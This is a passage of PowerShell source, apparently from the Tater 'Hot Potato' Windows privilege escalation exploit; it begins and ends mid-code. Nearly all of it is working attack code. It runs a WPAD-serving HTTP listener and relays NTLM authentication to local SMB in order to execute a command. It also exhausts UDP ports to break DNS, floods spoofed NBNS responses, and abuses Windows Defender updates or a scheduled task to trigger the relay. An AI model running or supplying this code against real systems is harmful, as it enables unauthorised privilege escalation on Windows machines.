0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + $HTTP_timestamp + 0x00,0x00,0x00,0x00,0x0a,0x0a $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 $NTLM_challenge = $HTTP_challenge return $NTLM } $SMBRelayTarget = "127.0.0.1" $HTTP_port_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTPPort) $WPADDirectHosts += "localhost" $HTTP_content_length = $WPADPort.Length + 62 foreach($WPAD_direct_host in $WPADDirectHosts) { $HTTP_content_length += $WPAD_direct_host.Length + 43 $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_content_length) $WPAD_direct_host_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPAD_direct_host) $WPAD_direct_host_function_bytes = 0x69,0x66,0x20,0x28,0x64,0x6e,0x73,0x44,0x6f,0x6d,0x61,0x69,0x6e,0x49, 0x73,0x28,0x68,0x6f,0x73,0x74,0x2c,0x20,0x22 + $WPAD_direct_host_bytes + 0x22,0x29,0x29,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x44,0x49, 0x52,0x45,0x43,0x54,0x22,0x3b $WPAD_direct_hosts_bytes += $WPAD_direct_host_function_bytes } $WPAD_port_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPADPort) :HTTP_listener_loop while ($tater.running) { if($tater.SMBRelay_success) { StopTater } $TCP_request = $NULL $TCP_request_bytes = New-Object System.Byte[] 1024 $suppress_waiting_message = $false while(!$tater.HTTP_listener.Pending() -and !$tater.HTTP_client.Connected) { if(!$suppress_waiting_message) { $tater.console_queue.Add("$(Get-Date -format 's') - Waiting for incoming HTTP connection") $suppress_waiting_message = $true } Start-Sleep -s 1 if($tater.SMBRelay_success) { StopTater } } if(!$tater.HTTP_client.Connected) { $tater.HTTP_client = $tater.HTTP_listener.AcceptTcpClient() $HTTP_stream = $tater.HTTP_client.GetStream() } while ($HTTP_stream.DataAvailable) { $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) } $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*") { $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $tater.request_RawUrl = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) if($tater.request_RawUrl -eq "") { $tater.request_RawUrl = "/" } } if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") { $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46) $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-")) $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length) } else { $authentication_header = '' } $HTTP_type = "HTTP" $HTTP_request_type = "" if ($tater.request_RawUrl -match '/wpad.dat') { $tater.response_StatusCode = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b $HTTP_WPAD_response = 0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x46,0x69,0x6e,0x64,0x50,0x72, 0x6f,0x78,0x79,0x46,0x6f,0x72,0x55,0x52,0x4c,0x28,0x75,0x72,0x6c,0x2c,0x68, 0x6f,0x73,0x74,0x29,0x7b + $WPAD_direct_hosts_bytes + 0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x50,0x52,0x4f,0x58,0x59,0x20,0x31, 0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a + $WPAD_port_bytes + 0x22,0x3b,0x7d $NTLM = '' $HTTP_request_type = "WPAD" } elseif ($tater.request_RawUrl -eq '/GETHASHES') { $tater.response_StatusCode = 0x34,0x30,0x31 $HTTP_response_phrase = 0x4f,0x4b $NTLM = 'NTLM' $HTTP_request_type = "NTLM" } else { $tater.response_StatusCode = 0x33,0x30,0x32 $HTTP_location = 0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x70,0x72, 0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79, 0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68, 0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x45,0x78,0x70,0x69, 0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,0x30,0x31,0x20,0x4a,0x61,0x6e,0x20, 0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54, 0x0d,0x0a,0x4c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3a,0x20,0x68,0x74,0x74,0x70,0x3a, 0x2f,0x2f,0x6c,0x6f,0x63,0x61,0x6c,0x68,0x6f,0x73,0x74,0x3a + $HTTP_port_bytes + 0x2f,0x47,0x45,0x54,0x48,0x41,0x53,0x48,0x45,0x53,0x0d,0x0a $HTTP_response_phrase = 0x4f,0x4b $NTLM = '' $HTTP_request_type = "Redirect" if($tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle) { $tater.console_queue.Add("$(Get-Date -format 's') - Attempting to redirect to http://localhost:" + "$HTTPPort/gethashes and trigger relay") } } if(($tater.request_RawUrl_old -ne $tater.request_RawUrl -and $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle) -or $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle) { $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for " + $tater.request_RawUrl + " received from " + $tater.HTTP_client.Client.RemoteEndpoint.Address) } if($authentication_header.StartsWith('NTLM ')) { $authentication_header = $authentication_header -replace 'NTLM ','' [byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) $tater.response_StatusCode = 0x34,0x30,0x31 $HTTP_response_phrase = 0x4f,0x4b if ($HTTP_request_bytes[8] -eq 1) { if($tater.SMB_relay_active_step -eq 0) { $tater.SMB_relay_active_step = 1 $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $tater.HTTP_client.Client.RemoteEndpoint.Address) $tater.console_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + "$SMBRelayTarget") $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient $SMB_relay_socket.connect($SMBRelayTarget,"445") if(!$SMB_relay_socket.connected) { $tater.console_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding") $tater.SMB_relay_active_step = 0 } if($tater.SMB_relay_active_step -eq 1) { $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $tater.SMB_relay_active_step = 2 $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.Length] $SMB_user_ID = $SMB_relay_bytes[34..33] $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes) $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-","" $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000") $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2 $SMB_domain_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)] $SMB_target_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)] $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)] $SMB_reserved = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 32)..($SMB_relay_NTLMSSP_bytes_index + 39)] $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)] $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 + $SMB_domain_length_offset_bytes + 0x05,0xc2,0x89,0xa2 + $SMB_relay_NTLM_challenge + $SMB_reserved + $SMB_target_length_offset_bytes + $SMB_relay_target_details $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes $tater.HTTP_challenge_queue.Add($tater.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $tater.HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) $tater.console_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge " + "for relay from $SMBRelayTarget") $tater.console_queue.Add("$(Get-Date -format 's') - Providing challenge " + "$NTLM_challenge for relay to " + $tater.HTTP_client.Client.RemoteEndpoint.Address) $tater.SMB_relay_active_step = 3 } else { $NTLM = NTLMChallengeBase64 } } else { $NTLM = NTLMChallengeBase64 } $tater.response_StatusCode = 0x34,0x30,0x31 $HTTP_response_phrase = 0x4f,0x4b } elseif ($HTTP_request_bytes[8] -eq 3) { $NTLM = 'NTLM' $HTTP_NTLM_offset = $HTTP_request_bytes[24] $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes if($HTTP_NTLM_domain_length -eq 0) { $HTTP_NTLM_domain_string = '' } else { $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes } $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes if ([System.BitConverter]::ToString($HTTP_request_bytes[16]) -eq '58' -and [System.BitConverter]::ToString($HTTP_request_bytes[24]) -eq '58' -and [System.BitConverter]::ToString($HTTP_request_bytes[32]) -eq '58') { $HTTP_NTLM_user_string = '' $HTTP_NTLM_host_string = '' } else { $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes } $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" $NTLM_response = $NTLM_response.Insert(32,':') $tater.response_StatusCode = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b $NTLM_challenge = '' if ($tater.SMB_relay_active_step -eq 3) { $tater.console_queue.Add("$(Get-Date -format 's') - Sending response for " + "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to " + "$SMBRelaytarget") $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.Length] if(!$SMB_relay_failed -and [System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00')) { $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay " + "authentication successful for $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string on $SMBRelayTarget") $tater.SMB_relay_active_step = 4 SMBRelayExecute $SMB_relay_socket $SMB_user_ID } else { $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay " + "authentication failed for $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string on $SMBRelayTarget") $tater.SMB_relay_active_step = 0 $SMB_relay_socket.Close() } } } else { $NTLM = 'NTLM' } } $HTTP_timestamp = Get-Date -format r $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61, 0x74,0x65,0x3a,0x20 if($NTLM) { $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM) $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + $tater.response_StatusCode + 0x20 + $HTTP_response_phrase + 0x0d,0x0a,0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a, 0x20,0x70,0x72,0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, 0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d, 0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38, 0x0d,0x0a,0x45,0x78,0x70,0x69,0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20, 0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30, 0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,0x0d,0x0a + $HTTP_WWW_authenticate_header + $NTLM + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68, 0x3a,0x20,0x30,0x0d,0x0a,0x0d,0x0a } elseif($HTTP_request_type -eq 'WPAD') { $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + $tater.response_StatusCode + 0x20 + $HTTP_response_phrase + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + $HTTP_content_length_bytes + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, 0x0a,0x44,0x61,0x74,0x65,0x3a + $HTTP_timestamp + 0x0d,0x0a,0x0d,0x0a + $HTTP_WPAD_response } elseif($HTTP_request_type -eq 'Redirect') { $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + $tater.response_StatusCode + 0x20 + $HTTP_response_phrase + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68, 0x3a,0x20,0x30,0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63, 0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50, 0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a + $HTTP_location + 0x44,0x61,0x74,0x65,0x3a + $HTTP_timestamp + 0x0d,0x0a,0x0d,0x0a } else { $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x20 + $tater.response_StatusCode + 0x20 + $HTTP_response_phrase + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68, 0x3a,0x20,0x31,0x30,0x37,0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d, 0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49, 0x2f,0x32,0x2e,0x30,0x0d,0x0a,0x44,0x61,0x74,0x65,0x3a + $HTTP_timestamp + 0x0d,0x0a,0x0d,0x0a } $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) $HTTP_stream.Flush() start-sleep -s 1 $tater.request_RawUrl_old = $tater.request_RawUrl $tater.HTTP_client_handle_old= $tater.HTTP_client.Client.Handle } } $exhaust_UDP_scriptblock = { $tater.exhaust_UDP_running = $true $tater.console_queue.Add("$(Get-Date -format 's') - Trying to exhaust UDP source ports so DNS lookups will fail") $UDP_socket_list = New-Object "System.Collections.Generic.List[Net.Sockets.Socket]" $UDP_failed_ports_list = New-Object "System.Collections.Generic.List[Int]" $i=0 for ($i = 0; $i -le 65535; $i++) { try { if ($i -ne 137 -and $i -ne 53) { $IP_end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]::Any,$i) $UDP_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::Udp) $UDP_socket.Bind($IP_end_point) $UDP_socket_list.Add($UDP_socket) } } catch { $UDP_failed_ports_list.Add($i); $tater.console_queue.Add("$(Get-Date -format 's') - Couldn't bind to UDP port $i") } } $tater.UDP_exhaust_success = $false while (!$tater.UDP_exhaust_success) { if(!$suppress_flush_message) { $tater.console_queue.Add("$(Get-Date -format 's') - Flushing DNS resolver cache") $suppress_flush_message = $true } DnsFlushResolverCache try { [System.Net.Dns]::GetHostEntry("microsoft.com") } catch { $tater.console_queue.Add("$(Get-Date -format 's') - DNS lookup failed so UDP exhaustion worked") $tater.UDP_exhaust_success = $true break } $tater.console_queue.Add("$(Get-Date -format 's') - DNS lookup succeeded so UDP exhaustion failed") foreach ($UDP_port in $UDP_failed_ports_list) { try { $IP_end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]::Any,$i) $UDP_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::Udp) $UDP_socket.Bind($IP_end_point) $UDP_socket_list.Add($UDP_socket) $UDP_failed_ports.Remove($UDP_port) } catch { $tater.console_queue.Add("$(Get-Date -format 's') - Failed to bind to $UDP_port during cleanup") } } } $tater.exhaust_UDP_running = $false } $spoofer_scriptblock = { param ($IP,$SpooferIP,$Hostname,$NBNSLimit) $Hostname = $Hostname.ToUpper() $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname) $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) $hostname_encoded = $hostname_encoded.Replace("-","") $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) for ($i=0; $i -lt $hostname_encoded.Count; $i++) { if($hostname_encoded[$i] -gt 64) { $hostname_bytes[$i] = $hostname_encoded[$i] + 10 } else { $hostname_bytes[$i] = $hostname_encoded[$i] + 17 } } $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + $hostname_bytes + 0x00,0x20,0x00,0x01,0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00 + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + 0x00,0x00,0x00,0x00 while($tater.exhaust_UDP_running) { Start-Sleep -s 2 } $tater.console_queue.Add("$(Get-Date -format 's') - Flushing DNS resolver cache") DnsFlushResolverCache $tater.console_queue.Add("$(Get-Date -format 's') - Starting NBNS spoofer to resolve $Hostname to $SpooferIP") $send_socket = New-Object System.Net.Sockets.UdpClient(137) $destination_IP = [System.Net.IPAddress]::Parse($IP) $destination_point = New-Object Net.IPEndpoint($destination_IP,137) $send_socket.Connect($destination_point) while ($tater.running) { :NBNS_spoofer_loop while (!$tater.hostname_spoof -and $tater.running) { for ($i = 0; $i -lt 255; $i++) { for ($j = 0; $j -lt 255; $j++) { $NBNS_response_packet[0] = $i $NBNS_response_packet[1] = $j $send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length) if($tater.hostname_spoof -and $NBNSLimit -eq 'Y') { break NBNS_spoofer_loop } } } } Start-Sleep -m 5 } $send_socket.Close() } $tater_scriptblock = { param ($NBNS,$NBNSLimit,$RunTime,$SpooferIP,$Hostname,$HTTPPort) if($RunTime) { $tater_timeout = new-timespan -Minutes $RunTime $tater_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } while ($tater.running) { if($tater.trigger -ne 2) { try { $Hostname_IP = [System.Net.Dns]::GetHostEntry($Hostname).AddressList[0].IPAddressToString } catch { # Don't need output for this } if($Hostname_IP -eq $SpooferIP) { if(!$suppress_spoofed_message) { $tater.console_queue.Add("$(Get-Date -format 's') - $Hostname has been spoofed to $SpooferIP") $suppress_spoofed_message = $true } if($NBNSLimit -eq 'Y') { $tater.hostname_spoof = $true } $hostname_spoof = $true $Hostname_IP = "" } elseif((!$Hostname_IP -or $Hostname_IP -ne $SpooferIP) -and $NBNS -eq 'Y') { $tater.hostname_spoof = $false $hostname_spoof = $false } } if(!$tater.SMBRelay_success -and $tater.trigger -eq 1) { if(Test-Path "C:\Program Files\Windows Defender\MpCmdRun.exe") { if(($process_defender.HasExited -or !$process_defender) -and !$tater.SMB_relay_success -and $hostname_spoof) { $tater.console_queue.Add("$(Get-Date -format 's') - Running Windows Defender signature update") $process_defender = Start-Process -FilePath "C:\Program Files\Windows Defender\MpCmdRun.exe" -Argument SignatureUpdate -WindowStyle Hidden -passthru } } else { $tater.console_queue.Add("Windows Defender not found") } } elseif(!$tater.SMBRelay_success -and $tater.trigger -eq 2) { $service_webclient = Get-Service WebClient if($service_webclient.Status -eq 'Stopped') { $tater.console_queue.Add("$(Get-Date -format 's') - Starting WebClient service") Start-Process -FilePath "cmd.exe" -Argument "/C pushd \\live.sysinternals.com\tools" -WindowStyle Hidden -passthru -Wait } if($service_webclient.Status -eq 'Running' -and !$tater.task_added -and !$tater.SMBRelay_success) { $timestamp_add = (Get-Date).AddMinutes(1) $timestamp_add_string = $timestamp_add.ToString("HH:mm") $tater.task = $tater.taskname if($tater.task_delete) { $tater.task += "_" $tater.task += Get-Random } $tater.console_queue.Add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task) $process_scheduled_task = "/C schtasks.exe /Create /TN " + $tater.task + " /TR \\127.0.0.1@$HTTPPort\test /SC ONCE /ST $timestamp_add_string /F" Start-Process -FilePath "cmd.exe" -Argument $process_scheduled_task -WindowStyle Hidden -passthru -Wait $schedule_service = new-object -com("Schedule.Service") $schedule_service.connect() $scheduled_task_list = $schedule_service.getfolder("\").gettasks(1) $tater.task_added = $false foreach($scheduled_task in $scheduled_task_list) { if($scheduled_task.name -eq $tater.task) { $tater.task_added = $true } } $schedule_service.Quit() if(!$tater.task_added -and !$tater.SMBRelay_success) { $tater.console_queue.Add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task + " failed") StopTater } } elseif($tater.task_added -and (Get-Date) -ge $timestamp_add.AddMinutes(2)) { $tater.console_queue.Add("$(Get-Date -format 's') - Something went wrong with the service") StopTater } } if($tater.SMBRelay_success) { Stop-Process -id $process_defender.Id } if($RunTime) { if($tater_stopwatch.Elapsed -ge $tater_timeout) { StopTater } } Start-Sleep -m 5 } } # HTTP Listener Startup Function function HTTPListener() { if($WPADPort -eq '80') { $tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::loopback,$HTTPPort) } else { $tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort) } $tater.HTTP_listener = New-Object System.Net.Sockets.TcpListener $tater.HTTP_endpoint $tater.HTTP_listener.Start() $HTTP_runspace = [RunspaceFactory]::CreateRunspace() $HTTP_runspace.Open() $HTTP_runspace.SessionStateProxy.SetVariable('tater',$tater) $HTTP_powershell = [PowerShell]::Create() $HTTP_powershell.Runspace = $HTTP_runspace $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Command).AddArgument($HTTPPort).AddArgument( $WPADDirectHosts).AddArgument($WPADPort) > $null $HTTP_powershell.BeginInvoke() > $null } # Exhaust UDP Startup Function function ExhaustUDP() { $exhaust_UDP_runspace = [RunspaceFactory]::CreateRunspace() $exhaust_UDP_runspace.Open() $exhaust_UDP_runspace.SessionStateProxy.SetVariable('tater',$tater) $exhaust_UDP_powershell = [PowerShell]::Create() $exhaust_UDP_powershell.Runspace = $exhaust_UDP_runspace $exhaust_UDP_powershell.AddScript($shared_basic_functions_scriptblock) > $null $exhaust_UDP_powershell.AddScript($exhaust_UDP_scriptblock) > $null $exhaust_UDP_powershell.BeginInvoke() > $null } # Spoofer Startup Function function Spoofer() { $spoofer_runspace = [RunspaceFactory]::CreateRunspace() $spoofer_runspace.Open() $spoofer_runspace.SessionStateProxy.SetVariable('tater',$tater) $spoofer_powershell = [PowerShell]::Create() $spoofer_powershell.Runspace = $spoofer_runspace $spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null $spoofer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null $spoofer_powershell.AddScript($spoofer_scriptblock).AddArgument($IP).AddArgument($SpooferIP).AddArgument( $Hostname).AddArgument($NBNSLimit) > $null $spoofer_powershell.BeginInvoke() > $null } # Tater Loop Function function TaterLoop() { $tater_runspace = [RunspaceFactory]::CreateRunspace() $tater_runspace.Open() $tater_runspace.SessionStateProxy.SetVariable('tater',$tater) $tater_powershell = [PowerShell]::Create() $tater_powershell.Runspace = $tater_runspace $tater_powershell.AddScript($shared_basic_functions_scriptblock) > $null $tater_powershell.AddScript($tater_scriptblock).AddArgument($NBNS).AddArgument($NBNSLimit).AddArgument( $RunTime).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument( $HTTPPort) > $null $tater_powershell.BeginInvoke() > $null } # HTTP Server Start HTTPListener # Exhaust UDP Start if($ExhaustUDP -eq 'Y') { ExhaustUDP } # Spoofer Start if($NBNS -eq 'Y') { Spoofer } # Tater Loop Start TaterLoop if($tater.console_output) { :console_loop while($tater.running -and $tater.console_output) { while($tater.console_queue.Count -gt 0) { Write-Output($tater.console_queue[0] + $tater.newline) $tater.console_queue.RemoveRange(0,1) } if($tater.console_input) { if([Console]::KeyAvailable) { $tater.console_output = $false BREAK console_loop } } Start-Sleep -m 5 } if(!$tater.running) { Remove-Variable tater -scope global } } } #End Invoke-Tater function Stop-Tater { <# .SYNOPSIS Stop-Tater will stop Tater before a successful privilege escalation. #> if($tater) { if($tater.running) { Write-Output "$(Get-Date -format 's') - Stopping HTTP listener" $tater.HTTP_listener.server.blocking = $false Start-Sleep -s 1 $tater.HTTP_listener.server.Close() Start-Sleep -s 